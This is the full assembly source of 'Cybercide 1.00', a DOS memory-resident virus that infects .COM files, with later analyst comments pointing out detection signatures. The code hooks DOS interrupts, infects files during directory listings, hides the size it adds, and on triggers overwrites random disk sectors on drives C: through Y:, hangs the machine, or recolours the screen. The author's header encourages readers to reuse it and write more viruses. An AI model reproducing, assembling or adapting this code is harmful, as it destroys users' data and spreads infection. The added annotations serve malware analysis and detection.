; Assembler directives in TASM/MASM syntax (the page tag "NASM" is wrong):
; tiny model, code and data in one segment, origin 100h => a .COM image.
; The header below names the build as "tasm /m3" + "tlink /t".
.model tiny
.code
org 100h
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
; A NEW ORDER OF INTELLIGENCE PRESENTS: ;
; ;
; Cybercide 1.00 - The original source-code ;
; Copyright (c) -91 by Cruel Entity / Macaroni Ted ;
; ;
; This one is really old now. Mcaffe virus scanner have detected it for ;
; years. Therefore I've decided to release it. I hope you'll learn some- ;
; thing from it. You are free to use routines from it and also rebuild ;
; it. Just give me some credits. ;
; ;
; I hope you'll feel the nice feeling you get when you hear that many ;
; hard-disks have been destroyed by you virus. So keep up the good work ;
; and write more virus. ;
; ;
; Of course I can't take any responsibility for all virus-coders who ;
; use any of the routines in this virus. ;
; ;
; Greetings to; God for creating AT&T's ;
; ;
; ps! Tasm /m3 and tlink /t to get this babe into executable! ;
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
;-----------------------------------------------------------------------
; start: entry point of the virus body (first code run in an infected .COM).
; Installs a resident copy of itself at the top of the host's memory block,
; hooks int 21h / 9h / 1Ch, then hands control back to the host.
; bp = runtime offset of sub_this ("delta offset"); until the resident copy
; is live every data reference is written as [bp+(label-sub_this)], because
; the body sits at a different offset in every infected file.
;-----------------------------------------------------------------------
start:
call $+3
sub_this: pop bp
; Residency handshake: ax=0DD22h is answered with ax=3D33h by the resident
; hook (see mem_check). This fixed pair is a usable behavioural signature.
mov ax,0dd22h ;are we already in memory?
int 21h
cmp ax,03d33h
jne $+7
; Already resident: skip installation, go straight to host restoration.
; ($+7 is a hard-coded skip over the following lea/jmp pair.)
lea dx,[bp+(cancel-sub_this)]
jmp far ptr dx
; Save the original vectors of the three interrupts that will be hooked;
; the saved words are the operands of the far jmps in the handlers below.
mov ax,3521h ;get int 21h vect
int 21h
mov [bp+(int_21h_off-sub_this)],bx
mov [bp+(int_21h_seg-sub_this)],es
mov ax,3509h ;get int 9h vect
int 21h
mov [bp+(int_9h_off-sub_this)],bx
mov [bp+(int_9h_seg-sub_this)],es
mov ax,351ch ;get int 1ch vect
int 21h
mov [bp+(int_1ch_off-sub_this)],bx
mov [bp+(int_1ch_seg-sub_this)],es
; Carve memlen paragraphs off the top of the host's own memory block by
; editing its MCB directly (es = cs-1 = the MCB in front of this PSP):
; MCB+3 is the block size in paragraphs, MCB+12h is PSP:0002h (the
; top-of-memory segment). DOS is never asked for the memory.
mov ax,cs
dec ax
mov es,ax
mov ax,es:[0003h]
sub ax,[bp+(memlen-sub_this)]
mov es:[0003h],ax
mov ax,[bp+(memlen-sub_this)]
sub word ptr es:[0012h],ax
mov es,es:[0012h]
push es
; Copy the whole body (filelen bytes) to offset 100h of the stolen segment.
lea si,[bp+(start-sub_this)]
mov di,0100h
mov cx,[bp+(filelen-sub_this)]
rep movsb
pop ds ;es => ds
; Point the three vectors at the resident copy (ds = resident segment).
mov ax,2521h ;new vector at ES:0100
lea dx,new_int_21h
int 21h
mov ax,2509h ;int 9h
lea dx,new_int_9h
int 21h
mov ax,251ch ;int 1ch
lea dx,new_int_1ch
int 21h
; cancel: put the host's original first 3 bytes (carried inside the body as
; first_bytes) back at cs:100h and jump there. Also the entry used when the
; handshake above showed the virus is already resident.
cancel:
push cs ;cs => ds => es
push cs
pop ds
pop es
lea si,[bp+(first_bytes-sub_this)]
mov cx,3
mov di,100h
rep movsb
sub di,3
jmp far ptr di
; Inert text: ULTIMATHULE is referenced by no code in this file. Several
; bytes are mis-encoded in this copy. Fixed strings like this one are the
; kind of static marker a scanner can key on.
ULTIMATHULE DB 'nam nesut agn<67>m dem <20>nk mo <20>nk ,marf'
db 'kcig xeR sluloraC ruh nes egn<67>l r<>f ,n<> in snniM'
; ^^^^^^^^^ Only a Swedish poem written backwards ^^^^^^^^^
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Resident part -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; Tune table for the hour-0 payload (darth_return): word pairs of
; (tone, duration) ended by a 0 word. darth_return loads 1193600/tone into
; PIT channel 2, so the first word is a frequency in Hz; the second is the
; count of busy-wait delay rounds. The trailing string is another inert
; reversed-text marker.
imperial_march dw 330,600
dw 330,600
dw 330,600
dw 262,450
dw 392,150
dw 330,600
dw 262,450
dw 392,150
dw 330,1200
dw 494,600
dw 494,600
dw 494,600
dw 523,450
dw 392,150
dw 330,600
dw 262,450
dw 392,150
dw 330,1200
dw 0
db 'YTITNE na ot LEURC eb reven'
;-----------------------------------------------------------------------
; darth_return: hour-0 payload, reached from new_int_21h by a far jump and
; never returning. Plays imperial_march on the PC speaker, writes two text
; rows of darth_pic into colour text video RAM, then spins forever -- the
; machine is hung inside the int 21h hook.
; Sets ds = es = cs; uses ax, cx, dx, si, di freely.
;-----------------------------------------------------------------------
darth_return:
push cs
push cs
pop ds
pop es
lea si,imperial_march
darth_again:
lodsw
cmp ax,0
je darth_end
mov di,ax
play:
; Program PIT channel 2: command 0B6h to port 43h, then the divisor
; 1193600/di (dx:ax = 0012h:3280h = 1,193,600) low byte first to port 42h.
mov al,0b6h
out 43h,al
mov dx,12h
mov ax,3280h
div di
out 42h,al
mov al,ah
out 42h,al
; Gate the speaker on (port 61h bits 0-1).
in al,61h
mov ah,al
or al,3
out 61h,al
delay:
; Busy-wait: (duration word) x 2700 iterations of `loop $`.
lodsw
mov cx,ax
m_delay:
push cx
mov cx,2700
loop $
pop cx
loop m_delay
; al here is the low byte of the duration word just loaded (lodsw
; overwrote the saved port value); whatever it is goes to port 61h.
out 61h,al
jmp darth_again
darth_end:
xor al,al ;sound off
out 61h,al
; Copy 320 bytes (160 char/attribute pairs = two 80-column rows) of
; darth_pic to B800:3680, i.e. row 23 of an 80x25 colour text screen.
mov ax,0b800h ;print ansi
mov es,ax
lea si,darth_pic
mov di,3680
mov cx,320
rep movsb
jmp $ ;hang
; Inert reversed-text marker.
db 'ynollef ELIV a si GINKLAWYAJ'
;-----------------------------------------------------------------------
; next_hour: reached from new_int_21h (minute == 0) by a far jump, with the
; caller's ax, cx, dx pushed above the hook's saved flags. dh = seconds and
; dl = hundredths as returned by int 21h/2Ch. Only seconds == 0 with
; hundredths < 5 reaches random_sector; every other path restores the
; registers and chains to DOS through exit.
;-----------------------------------------------------------------------
next_hour:
cmp dh,0
je check_100th
pop dx
pop cx
pop ax
jmp exit
check_100th:
cmp dl,5
jb random_sector
pop dx
pop cx
pop ax
jmp exit
; random_sector: the destructive payload. int 26h (absolute disk write,
; below the file system) writes one sector on every drive number 2..24
; (C: through Y:) at sector number get_rnd()/10. The buffer is ds:bx with
; bx = offset logo, but ds has not been reloaded with cs, so it is still
; the interrupted program's data segment. Any int 26h issued from a
; resident handler is a strong detection indicator.
random_sector:
pushf
push bx
call get_rnd
mov cx,10 ;/ 10
xor dx,dx
div cx
mov dx,ax ;dx=ax
mov al,2h ;drive #, start with c:
mov cx,1h ;# of sectors to overwrite
lea bx,logo ;address to overwriting data
loopie:
; int 26h leaves the flags word on the stack; the popf discards it.
int 26h
popf
inc al
cmp al,25
jne loopie
pop bx
popf
pop dx
pop cx
pop ax
jmp exit
; Inert text marker.
db '... I SHALL FEAR NO EVIL ...'
;-----------------------------------------------------------------------
; check_time_int1c: reached from new_int_21h when int 21h/2Ah reported
; day-of-week 6 (Saturday), with ax/cx/dx pushed on the hook's stack.
; From 16:00 on it sets flagga, which makes the int 1Ch hook recolour the
; screen on every tick (print_flag). Both paths restore the registers and
; chain to the original DOS handler through exit.
;-----------------------------------------------------------------------
check_time_int1c:
mov ah,2ch ;get time
int 21h
cmp ch,16 ;>16:??
jae set_flag_flag
pop dx
pop cx
pop ax
jmp exit
set_flag_flag:
mov cs:flagga,1
pop dx
pop cx
pop ax
jmp exit
; Intended sector buffer for random_sector. int 26h writes a whole sector
; (typically 512 bytes) from ds:bx, so far more than these 15 bytes would
; follow it to disk. The string itself is a usable static signature.
logo db '>>> A.N.O.I <<<' ; DATA to overwrite with
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; New Interrupt 21h Handler
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;-----------------------------------------------------------------------
; new_int_21h: resident DOS service hook. Dispatch on ax/ah:
;   ax=DD22h    -> mem_check (residency handshake, answers ax=3D33h)
;   2Ch/2Ah/09h -> chained untouched (2Ch/2Ah are also what this hook
;                  issues itself below, so this avoids re-entering it)
;   11h/12h     -> find_old  (FCB find first/next: stealth + infection)
;   4Eh/4Fh     -> find_     (handle find first/next: stealth + infection)
;   3Dh         -> open_file (disinfects an infected .COM on open)
; Every other function first runs the trigger checks -- hour 0 ->
; darth_return (hang), minute 0 -> next_hour (disk overwrite), Saturday ->
; check_time_int1c (screen recolouring) -- and then falls through to the
; original handler. Flags are saved on entry and restored at exit.
;-----------------------------------------------------------------------
new_int_21h:
pushf
cmp ax,0dd22h ;mem check
je mem_check
cmp ah,2ch ;time?
je exit
cmp ah,2ah ;date?
je exit
cmp ah,9
je exit
cmp ah,11h
je find_old
cmp ah,12h
je find_old
cmp ah,4eh ;dos 2.x
je find_
cmp ah,4fh
je find_
cmp ah,3dh ;open file
je open_file
; Trigger checks. ax/cx/dx are saved here and restored by whichever path
; ends in exit; ds/es stay as the caller had them.
push ax
push cx
push dx
mov ah,2ch
int 21h
cmp ch,00 ;24:??
jne $+7
lea dx,darth_return
jmp far ptr dx
cmp cl,00 ;a new hour?
jne $+7
lea ax,next_hour
jmp far ptr ax
mov ah,2ah ;get date
int 21h
cmp al,6 ;flag time? (SAT)
je check_time_int1c ;check time
pop dx
pop cx
pop ax
exit:
popf
; Far jmp to the original int 21h; offset/segment are patched in by start.
real_int_21h: db 0eah ;jmp...
int_21h_off dw ? ;to old int 21h
int_21h_seg dw ?
; call_int21h: used by the virus's own file operations as
; `pushf / push cs / call call_int21h`, so the original handler's iret
; returns here. This bypasses the hook above, including its own stealth.
call_int21h:
jmp dword ptr cs:int_21h_off ;force a call to DOS
ret
; open_file / find_: bp is pushed and used as the jump register; the
; targets (open, find_new) pop bp back before anything else.
open_file:
push bp
lea bp,open
jmp far ptr bp
find_:
push bp
lea bp,find_new
jmp far ptr bp
; mem_check: residency answer (DD22h -> 3D33h), returned with iret.
mem_check:
popf
mov ax,3d33h
iret
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Stealth FCB
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;-----------------------------------------------------------------------
; find_old: stealth for FCB find first/next (int 21h/11h,12h).
; Lets DOS perform the search, then inspects the entry DOS left in the DTA.
; The offsets used (8 name, 16 ext, 30 time, 36 size low, 38 size high)
; match an extended-FCB directory entry (7-byte prefix + drive byte +
; 32-byte entry) -- assumed, the FCB type itself is never checked.
; For a *.COM entry whose size high word is 0:
;   - time seconds field == 24 (low 5 bits == 12), the infection marker
;     -> subtract filelen from the reported size, so a directory listing
;        shows the pre-infection length;
;   - otherwise -> far jump to infect: the file is infected during the
;     directory search.
; Returns to the caller with retf 2 (drops the flags word pushed by the
; caller's int; flags are those DOS returned).
;-----------------------------------------------------------------------
find_old:
popf
pushf ;find fcb
push cs
call call_int21h
cmp al,0ffh
je no_more_files
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh ;get dta
int 21h
push es ;es:bx
pop ds ;ds:bx
mov si,bx ;ds:si
add si,16 ;ext name
lodsw
cmp ax,'OC' ;.CO
jne cancel_ff
lodsb
cmp al,'M' ;M
jne cancel_ff
ext_ok:
;ext=com
mov si,bx ;check size
add si,26h
lodsw
cmp ax,0 ;=> 0ffffh?
jne cancel_ff
; Infection marker: DOS stores seconds/2 in the low 5 bits of the time
; word, so 12 here means 24 seconds. A .COM whose timestamp has seconds
; == 24 is therefore a cheap static indicator for this virus.
mov si,bx ;check if already infected
add si,30
lodsw ;time
and al,00011111b
cmp al,12
je $+7 ;already infected (sec=24)
lea dx,infect
jmp far ptr dx
; Already infected: hide the appended body from the size field.
mov si,bx ;alter size
add si,36
mov di,si
lodsw
sub ax,cs:filelen
jz cancel_ff
stosw
cancel_ff:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files: retf 2 ;iret flags
; cancel_inf: entered from infect when its open fails, with the two extra
; words infect pushed (bx+30 and es) still on the stack.
cancel_inf:
pop ax
pop ax
jmp cancel_ff
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Stealth 4Eh
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;-----------------------------------------------------------------------
; find_new: stealth for handle-based find first/next (int 21h/4Eh,4Fh).
; Entered from find_ with bp pushed; bp is restored first. DOS performs the
; search (CF set -> return at once), then the DTA entry is examined using
; the standard find-data layout: +16h time, +1Ah size low, +1Ch size high,
; +1Eh ASCIIZ name. The name is copied to cs:filename (at most 25 bytes,
; NUL-terminated) and its last three characters compared with COM/com
; (only these two spellings, plus 'COm'/'coM', match).
; For a .COM whose size high word is 0: seconds == 24 -> subtract filelen
; from the reported size; otherwise -> attrib_check, i.e. the file is
; infected during the search with cs:filename already prepared.
;-----------------------------------------------------------------------
find_new:
pop bp
popf
pushf ;find 4e
push cs
call call_int21h
jnc more_files
retf 2
more_files:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh ;get dta
int 21h
push es ;es:bx
pop ds ;ds:bx
mov si,bx ;ds:si
add si,16h
; Two extra words -- pointer to the DTA time field and its segment --
; stay on the stack for infect; cancel_new pops them again.
push si ;ONLY for infection
push es
mov si,bx
push cs ;cs => es
pop es
add si,1eh ;f name
lea di,filename
mov cx,25
get_fname:
lodsb
cmp al,0
je get_f_klar
stosb
loop get_fname
get_f_klar:
mov al,0 ;asciiz
stosb
push ds ;ds=> es
pop es
push cs ;cs=> ds
pop ds
; si = the three characters before the NUL just stored.
mov si,di
sub si,4 ;'COM'
lodsw ;CO
cmp ax,'OC'
je check_m
cmp ax,'oc'
jne cancel_new
check_m:
lodsb
cmp al,'m'
je ext_is_com
cmp al,'M'
jne cancel_new
ext_is_com:
push es ;es=> ds
pop ds
mov si,bx
add si,1ch ;check size
lodsw
cmp ax,0 ;=> 0ffffh
jne cancel_new
; Same infection marker as find_old: seconds field == 24.
mov si,bx
add si,16h
lodsw ;time
and al,00011111b
cmp al,12
jne attrib_check ;already infected (sec=24)
mov si,bx
add si,1ah
mov di,si
lodsw ;alter size
sub ax,cs:filelen
jz cancel_new
stosw
cancel_new:
pop ax ;crap...
pop ax
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files2: retf 2 ;iret flags
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Infect
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;-----------------------------------------------------------------------
; infect: append the virus body to the .COM named by the DTA entry.
; Entered from find_old with ds = es = DTA segment and bx = entry offset:
; pushes bx+30 (time field) and es for later, builds "NAME.EXT" (space-
; terminated 8-char name at +8, 3-char ext at +16) as an ASCIIZ string in
; cs:filename, then falls into attrib_check. attrib_check is also the
; target from find_new, which arrives with cs:filename filled and its own
; two words pushed.
; Sequence: read attributes (4300h) and save them; clear all attributes
; (4301h, cx=0); open read/write through call_int21h (bypassing this
; hook's own 3Dh handler, which would presumably undo the infection);
; read the host's first 3 bytes into first_bytes, which travel inside the
; body; seek to EOF to get the size; jmp_2 = size-3 (displacement of a jmp
; at offset 100h to the appended body); write filelen bytes from cs:100h
; (the resident copy); write the 3-byte E9 jmp at offset 0; set the time
; back with seconds forced to 24 (infection marker) and the original date;
; close; restore the saved attributes; return via cancel_ff.
; Sizes >= 64K never get here: both callers check the size high word.
;-----------------------------------------------------------------------
infect:
add bx,30
push bx
sub bx,30
push es
mov si,bx ;fname
add si,8
push cs ;cs=>es
pop es
lea di,filename
mov cx,8
cpy_name:
lodsb
cmp al,20h
je name_klar
stosb
loop cpy_name
name_klar:
mov al,'.'
stosb
mov si,bx
add si,16
mov cx,3
rep movsb
mov al,0
stosb
attrib_check:
push cs ;cs=> ds => es
push cs
pop ds
pop es
mov ax,4300h ;get attrib
lea dx,filename
int 21h
mov attribute,cx ;save it
; Read-only/hidden/system are cleared here and put back after the write.
xor cx,cx
mov ax,4301h ;force all attribs
int 21h
mov ax,3d02h ;open file
pushf
push cs
call call_int21h
jnc $+7 ;not a valid filename
lea dx,cancel_inf
jmp far ptr dx
mov bx,ax ;handle
mov ah,3fh ;3 first bytes
lea dx,first_bytes
mov cx,3
int 21h
mov ax,4202h ;go eof and get size
xor dx,dx
xor cx,cx
int 21h
; Only the low word of the size is used (dx is ignored).
sub ax,3
mov jmp_2,ax
mov ah,40h ;write virus to eof
mov cx,filelen ;virlen
mov dx,100h
int 21h
mov ax,4200h ;goto beg
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write a jmp
mov cx,3
lea dx,jmp_1
int 21h
; Pop the DTA time-field pointer pushed by the caller: cx = time with the
; seconds field replaced by 12 (= 24 s), dx = date unchanged.
pop ds ;=> DTA
pop si
lodsw
and al,11100000b ;secs=24
or al,00001100b
mov cx,ax
lodsw ;date
mov dx,ax
mov ax,5701h ;set time/date
int 21h
mov ah,3eh
pushf
push cs
call call_int21h ;close file
mov ax,4301h ;set attrib
push cs ;cs =>ds
pop ds
mov cx,attribute
lea dx,filename
int 21h
jmp cancel_ff
; cancel_uninf2 / cancel_uninf: exits used by open. Close the handle in bx
; (cancel_uninf2 only), restore all registers, then run the caller's
; original request through the real DOS handler and return its result
; with retf 2.
cancel_uninf2:
mov ah,3eh
pushf
push cs
call call_int21h ;close file
cancel_uninf:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
pushf
push cs
call call_int21h
retf 2 ;iret flags
; Inert text marker.
konstig_text db '**CYBERCIDE** -- FLOATING THROUGH THE VOID'
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; Open
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
;-----------------------------------------------------------------------
; open: hook for int 21h/3Dh (open file). Entered from open_file with bp
; pushed; bp is restored first. ds:dx is scanned for a NUL within 25h
; bytes and the three characters before it are compared with COM/com.
; For a .COM the file is opened with the caller's own ax through the real
; handler and its timestamp read (5700h). When the seconds field is 24
; (infection marker) the file is disinfected in place: up to 0FFFFh bytes
; are read into segment 9000h, the last 3 bytes (the saved host bytes,
; first_bytes) are copied over offset 0, the first (size - filelen) bytes
; are written back and the file is truncated with a 0-byte write. The
; handle is closed, registers restored, and the caller's original open is
; then performed by the real handler (retf 2 returns its result).
; Net effect: anything that opens an infected .COM gets the clean host.
; Segment 9000h is used as scratch memory unconditionally, whatever is
; loaded there.
;-----------------------------------------------------------------------
open:
pop bp
popf
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
push ds ;ds=> es
pop es
mov bx,dx ;save dx = bx
mov bp,ax ;save ax = bp
mov di,dx
mov cx,025h ;MAX
mov dx,cx
mov al,0
; Find the terminating NUL; di then points just past it.
repnz scasb
sub di,4
mov si,di
lodsw
cmp ax,'OC'
je check_m2
cmp ax,'oc'
jne cancel_uninf
check_m2:
lodsb
cmp al,'m'
je ext_is_com2
cmp al,'M'
jne cancel_uninf
ext_is_com2:
mov dx,bx ;restore
mov ax,bp ;restore
pushf
push cs
call call_int21h ;open file
jc cancel_uninf
mov bx,ax ;handle
mov ax,5700h ;get time/date
int 21h
; Infection marker check (seconds field == 24); not infected -> close and
; let the real open run.
and cl,00011111b
cmp cl,12
je $+7
lea bp,cancel_uninf2
jmp far ptr bp
mov ax,9000h ;temp area
mov ds,ax ;ds
mov es,ax ;es
mov ah,3fh ;read whole file
mov cx,0ffffh
mov dx,0
int 21h
; ax = bytes read; the body's last 3 bytes are the host's original first 3.
mov si,0
add si,ax ;add size
sub si,3 ;3 last bytes
mov di,0 ;copy 3 last bytes to
mov cx,3 ;beg
rep movsb
push ax
mov ax,4200h ;goto beg
mov cx,0
mov dx,0
int 21h
pop cx
sub cx,cs:filelen
mov ah,40h ;write new file
mov dx,0
int 21h
mov ah,40h ;set eof mark
mov cx,0
int 21h
mov ah,3eh
pushf
push cs
call call_int21h ;close file
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
pushf
push cs
call call_int21h ;force open
retf 2
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; New Interrupt 9h Handler
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
;-9h
;-----------------------------------------------------------------------
; new_int_9h: keyboard interrupt hook, runs before the BIOS handler.
; Reads the BIOS shift-state byte at 0000:0417h; if Alt is down (bit 3) and
; the scan code at port 60h is 53h (Del), alt_del writes the letters A, N,
; I, O into the four corners of the B800h text screen. Otherwise a small
; state machine in anoi_flag watches for the key sequence a, n, o, i (make
; codes 1Eh, 31h, 18h, 17h); once all four were seen, the next scan code
; makes anoi_ print anoi_text through the BIOS teletype service
; (int 10h/0Eh). e_3rd counts non-matching scan codes (key releases
; included) and resets the sequence after 10 of them.
; Saved: flags, ax, bx, ds. alt_del also writes es and di without saving
; them. All exits fall into real_int_9h, a far jmp to the original handler
; patched in by start.
;-----------------------------------------------------------------------
new_int_9h:
pushf
push ax
push bx
push ds
xor ax,ax ;ds=> 0
mov ds,ax
mov al,byte ptr ds:[0417h] ;bios, shift status
and al,8
cmp al,8 ;is alt active?
jne check_anoi ;not pressed
in al,60h
cmp al,53h ;del?
jne $+7
lea ax,alt_del
jmp far ptr ax
check_anoi:
in al,60h ;read key
cmp cs:anoi_flag,0
je check_a
cmp cs:anoi_flag,1
je check_n
cmp cs:anoi_flag,2
je check_o
cmp cs:anoi_flag,3
je check_i
cmp cs:anoi_flag,4
je anoi_
exit_zero:
mov cs:anoi_flag,0
mov cs:e_3rd,0
exit_9h:
pop ds
pop bx
pop ax
popf
real_int_9h: db 0eah ;jmp...
int_9h_off dw ? ;to old int 9h
int_9h_seg dw ?
; State of the a-n-o-i sequence (0..4) and the mismatch counter.
anoi_flag db 0
e_3rd db 0
anoi_text db ' iS AROUND!',0
exit_anoi:
inc cs:e_3rd
cmp cs:e_3rd,10
je exit_zero
jmp exit_9h
check_a:
cmp al,1eh ;'a'
jne exit_anoi
mov cs:anoi_flag,1
jmp exit_9h
check_n:
cmp al,31h ;'n'
jne exit_anoi
mov cs:anoi_flag,2
jmp exit_9h
check_o:
cmp al,18h ;'o'
jne exit_anoi
mov cs:anoi_flag,3
jmp exit_9h
check_i:
cmp al,17h ;'i'
jne exit_anoi
mov cs:anoi_flag,4
jmp exit_9h
; anoi_: teletype-print anoi_text (page 0, bx=0) from inside the
; keyboard interrupt, then reset the state machine.
anoi_:
push bp
mov ah,0eh ;print chr
mov bx,0
xor bp,bp
print_next:
mov al,cs:[anoi_text+bp]
int 10h
inc bp
cmp al,0
jne print_next
pop bp
jmp exit_zero
; alt_del: Alt+Del pressed. Offsets 0 / 158 / 3998 / 3840 are the
; character bytes of the top-left, top-right, bottom-right and bottom-left
; cells of an 80x25 text screen. es and di are clobbered here.
alt_del:
mov ax,0b800h
mov es,ax
mov di,0
mov al,'A'
stosb
mov di,158
mov al,'N'
stosb
mov di,3998
mov al,'I'
stosb
mov di,3840
mov al,'O'
stosb
jmp exit_9h
; Screen image for darth_return: 160 (character, attribute) pairs = two
; 80-column text rows = 320 bytes, copied verbatim into video RAM. The
; readable text ("I hereby proclaim this computer as the property of
; A.N.O.I" / "!! ALL HAIL DARTH VADER !!") is a usable static signature.
; The '<27>' characters are mis-encoded in this copy of the file.
darth_pic:
DB '<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30,' ',7,' ',7
DB ' ',7,' ',15,' ',15,'I',15,' ',15,'h',15,'e',15,'r',15
DB 'e',15,'b',15,'y',15,' ',15,'p',15,'r',15,'o',15,'c',15
DB 'l',15,'a',15,'i',15,'m',15,' ',15,'t',15,'h',15,'i',15
DB 's',15,' ',15,'c',15,'o',15,'m',15,'p',15,'u',15,'t',15
DB 'e',15,'r',15,' ',15,'a',15,'s',15,' ',15,'t',15,'h',15
DB 'e',15,' ',15,'p',15,'r',15,'o',15,'p',15,'e',15,'r',15
DB 't',15,'y',15,' ',15,'o',15,'f',15,' ',15,'A',15,'.',15
DB 'N',15,'.',15,'O',15,'.',15,'I',15,' ',15,' ',15,' ',7
DB ' ',7,' ',14,'<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30,'<27>',30
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,'!',15,'!',15,' ',15,'A',15,'L',15
DB 'L',15,' ',15,'H',15,'A',15,'I',15,'L',15,' ',15,'D',15
DB 'A',15,'R',15,'T',15,'H',15,' ',15,'V',15,'A',15,'D',15
DB 'E',15,'R',15,' ',15,'!',15,'!',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
DB ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; New Interrupt 1Ch Handler
;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
;-----------------------------------------------------------------------
; new_int_1ch: timer-tick hook. Does nothing until flagga is set by
; check_time_int1c (Saturdays from 16:00). Then, on every tick, print_flag
; rewrites the attribute byte of all 2000 cells of the B800h text screen:
; the low 3 bits (foreground) are kept and OR'ed with a value from tabl.
; tabl holds (cell count, attribute) pairs ended by a 0 count: 35/10/35
; make one 80-column row, the four 80-cell rows in the middle a horizontal
; bar -- a cross-flag pattern in two background colours over 25 rows
; ("flagga" is Swedish for flag).
; Saved/restored: flags, ax, bx, cx, di, si, ds, es, bp. dx is not used.
;-----------------------------------------------------------------------
new_int_1ch:
pushf
cmp cs:flagga,0
jne print_flag
exit_1c:
popf
real_int_1ch: db 0eah ;jmp...
int_1ch_off dw ? ;to old int 1ch
int_1ch_seg dw ?
flagga db 0 ;no flag
print_flag:
push ax
push bx
push cx
push di
push si
push ds
push es
push bp
cld
mov ax,0b800h
mov es,ax
mov ds,ax
; Start at offset 1 and step by 2: only attribute bytes are touched.
mov di,1
mov si,1
lea bp,tabl
xor ch,ch
mov cl,cs:[bp]
inc bp
again:
mov bl,cs:[bp]
inc bp
line:
lodsb
and al,00000111b
or al,bl
stosb
inc di
inc si
loop line
mov cl,cs:[bp]
inc bp
cmp cl,0
jne again
pop bp
pop es
pop ds
pop si
pop di
pop cx
pop bx
pop ax
jmp exit_1c
; # B G B  -- (cell count, attribute) pairs; 16 = 10h and 96 = 60h are
; background colours 1 and 6; a 0 count ends the list. 25 rows in all.
tabl db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 80,96,80,96,80,96,80,96
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16
db 35,16, 10,96, 35,16, 35,16, 10,96, 35,16, 35,16, 10,96, 35,16,0
; Inert text marker (includes the family name and a date string).
DB '-=CYBERCIDE=- 01-30-1993 * COPYRIGHT (C) 1992-93 A.N.O.I DEVELOPMENT'
;-----------------------------------------------------------------------
; get_rnd: pseudo-random byte in al, seeded from the PIT channel-0 counter
; read at port 40h. Seven rounds of shift-ax / rotate-dx with a feedback
; step (al += 1 when the sign bit of al xor dh is set); the result is dl.
; Preserves dx, cx, bx. ah is NOT cleared -- it keeps the shifted-in bits
; of the caller's ah, and random_sector then divides the full ax by 10.
